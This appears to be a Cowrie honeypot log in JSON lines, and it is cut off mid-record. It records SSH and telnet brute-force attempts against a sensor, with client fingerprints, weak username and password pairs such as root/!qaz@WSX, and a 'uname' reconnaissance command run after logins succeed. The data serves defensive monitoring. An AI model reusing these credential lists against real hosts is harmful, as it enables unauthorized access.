{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":34311,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b691938b51d","protocol":"ssh","message":"New connection: 45.125.211.194:34311 (1.2.3.4:22) [session: 8b691938b51d]","sensor":"my-vps","timestamp":"2025-08-28T03:18:01.729248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:01.756449Z","src_ip":"45.125.211.194","session":"8b691938b51d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:01.941524Z","src_ip":"45.125.211.194","session":"8b691938b51d"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":53488,"dst_ip":"1.2.3.4","dst_port":22,"session":"847499e774a9","protocol":"ssh","message":"New connection: 194.233.79.134:53488 (1.2.3.4:22) [session: 847499e774a9]","sensor":"my-vps","timestamp":"2025-08-28T03:18:02.035559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:02.266987Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:02.267911Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:02.777185Z","src_ip":"45.125.211.194","session":"8b691938b51d"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:18:03.677568Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:03.988272Z","src_ip":"45.125.211.194","session":"8b691938b51d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:18:04.237499Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:18:04.238252Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:04.497432Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:04.498622Z","src_ip":"194.233.79.134","session":"847499e774a9"}
{"eventid":"cowrie.session.connect","src_ip":"195.3.224.183","src_port":56129,"dst_ip":"1.2.3.4","dst_port":23,"session":"ecc4b375a548","protocol":"telnet","message":"New connection: 195.3.224.183:56129 (1.2.3.4:23) [session: ecc4b375a548]","sensor":"my-vps","timestamp":"2025-08-28T03:18:11.001850Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52308,"dst_ip":"1.2.3.4","dst_port":22,"session":"67a78b90cce2","protocol":"ssh","message":"New connection: 212.227.125.160:52308 (1.2.3.4:22) [session: 67a78b90cce2]","sensor":"my-vps","timestamp":"2025-08-28T03:18:11.968897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:11.969981Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:12.185021Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:18:12.833542Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:18:13.354165Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:18:13.354841Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:13.572925Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:13.574247Z","src_ip":"212.227.125.160","session":"67a78b90cce2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34960,"dst_ip":"1.2.3.4","dst_port":22,"session":"af7ac1e5cb8e","protocol":"ssh","message":"New connection: 212.227.235.229:34960 (1.2.3.4:22) [session: af7ac1e5cb8e]","sensor":"my-vps","timestamp":"2025-08-28T03:18:14.733253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:14.733917Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:14.983308Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:18:15.732839Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:18:16.250510Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.251388Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.502969Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.504013Z","src_ip":"212.227.235.229","session":"af7ac1e5cb8e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":50998,"dst_ip":"1.2.3.4","dst_port":22,"session":"eca4c394119e","protocol":"ssh","message":"New connection: 45.125.211.194:50998 (1.2.3.4:22) [session: eca4c394119e]","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.628252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.648200Z","src_ip":"45.125.211.194","session":"eca4c394119e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:16.843162Z","src_ip":"45.125.211.194","session":"eca4c394119e"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:17.668937Z","src_ip":"45.125.211.194","session":"eca4c394119e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:18.879074Z","src_ip":"45.125.211.194","session":"eca4c394119e"}
{"eventid":"cowrie.session.closed","duration":13.230676412582397,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:24.232431Z","src_ip":"195.3.224.183","session":"ecc4b375a548"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55838,"dst_ip":"1.2.3.4","dst_port":22,"session":"88dc445d468a","protocol":"ssh","message":"New connection: 212.227.235.229:55838 (1.2.3.4:22) [session: 88dc445d468a]","sensor":"my-vps","timestamp":"2025-08-28T03:18:26.218241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:26.283071Z","src_ip":"212.227.235.229","session":"88dc445d468a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:26.532460Z","src_ip":"212.227.235.229","session":"88dc445d468a"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:27.281592Z","src_ip":"212.227.235.229","session":"88dc445d468a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:28.533409Z","src_ip":"212.227.235.229","session":"88dc445d468a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22755,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1e13a750170","protocol":"ssh","message":"New connection: 45.125.211.194:22755 (1.2.3.4:22) [session: e1e13a750170]","sensor":"my-vps","timestamp":"2025-08-28T03:18:31.433094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:31.457531Z","src_ip":"45.125.211.194","session":"e1e13a750170"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:31.649152Z","src_ip":"45.125.211.194","session":"e1e13a750170"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:32.480150Z","src_ip":"45.125.211.194","session":"e1e13a750170"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:33.690485Z","src_ip":"45.125.211.194","session":"e1e13a750170"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48484,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9942e0a3f6c","protocol":"ssh","message":"New connection: 212.227.235.229:48484 (1.2.3.4:22) [session: b9942e0a3f6c]","sensor":"my-vps","timestamp":"2025-08-28T03:18:38.245414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:38.246305Z","src_ip":"212.227.235.229","session":"b9942e0a3f6c"}
{"eventid":"cowrie.session.connect","src_ip":"103.175.5.202","src_port":52576,"dst_ip":"1.2.3.4","dst_port":23,"session":"f66f26c1b202","protocol":"telnet","message":"New connection: 103.175.5.202:52576 (1.2.3.4:23) [session: f66f26c1b202]","sensor":"my-vps","timestamp":"2025-08-28T03:18:38.413605Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:38.509614Z","src_ip":"212.227.235.229","session":"b9942e0a3f6c"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:39.299740Z","src_ip":"212.227.235.229","session":"b9942e0a3f6c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:40.565034Z","src_ip":"212.227.235.229","session":"b9942e0a3f6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58922,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c2fc29aff59","protocol":"ssh","message":"New connection: 212.227.235.229:58922 (1.2.3.4:22) [session: 8c2fc29aff59]","sensor":"my-vps","timestamp":"2025-08-28T03:18:43.974417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:43.975446Z","src_ip":"212.227.235.229","session":"8c2fc29aff59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes12